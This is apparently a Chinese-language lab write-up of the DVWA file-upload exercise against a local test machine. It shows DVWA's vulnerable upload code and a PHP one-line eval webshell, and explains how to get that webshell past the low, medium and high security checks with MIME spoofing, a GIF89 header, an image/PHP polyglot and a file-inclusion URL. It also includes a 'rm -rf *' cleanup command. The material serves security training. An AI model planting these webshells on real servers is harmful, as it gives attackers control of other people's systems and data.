靶机介绍
实验原理
- 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等
- 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回
- 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell
- 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网
- SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制
查询语句
cd /var/www/dvwa/hackable/uploads
#文件上传的路径
http://192.168.238.131/dvwa/hackable/uploads/shell.php
#蚁剑连接地址
<?php @eval($_POST['pass']);?>
#一句话木马
root@owaspbwa:/var/www/dvwa/hackable/uploads# cat shell.php
#查看shell这个文件
fgrep -R 'eval($_POST[' /var/www/dvwa
#过滤关键字包含eval的文件
rm -rf *
#删除所有
tip1在低安全级别下没有对文件源码,后缀进行检测;只限制了文件大小
tip2:在中安全模式下使用mine类型对image/jpeg和不超过100KB的进行限制
tip3:在高安全模式下对文件后缀jpg进行限制
tip4:更改文件头文件可以连接,更改文件后缀无法连接
tip5:如果进去文件能看网站结构无法更改数据则是上一个缓存问题或者无权限
代码分析
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
# $_FILES["file"]["name"] - 被上传文件的名称
# $_FILES["file"]["tmp_name"] - 存储在服务器的文件的临时副本的名称
# basename() 函数返回路径中的文件名部分
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
# move_uploaded_file() 函数将上传的文件移动到新位置
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
#只对一下进行了限制
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) )
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>if (isset($_POST['Upload']))
{
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){}
}
实验过程
一、低安全模式下的文件上传
if (isset($_POST['Upload'])) {} 低安全模式下,上传任意类型的文件
<?php @eval($_POST['pass']);?>
#一句话木马
二、中安全模式下的文件上传
$uploaded_type = $_FILES['uploaded']['type']; $uploaded_size = $_FILES['uploaded']['size']; if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000) 在中安全模式下使用mine类型对image/jpeg和小于100KB的进行限制
1、使用修改文件头欺骗上传
2、使用文件包含配和文件上传漏洞
<?php @eval($_POST['pass']);?>
三、高安全模式下文件上传
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" && ($uploaded_size < 100000))
在高安全模式下对文件后缀jpg进行限制
正在上传…重新上传取消
制作一句话木马 GIF89 <?php @eval($_POST['pass']);?>
本地生成木马图片copy 1.jpg /b + shell.php shell.jpg
上传木马图片
再文件包含中page后接..图片地址
http://192.168.238.131/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.jpg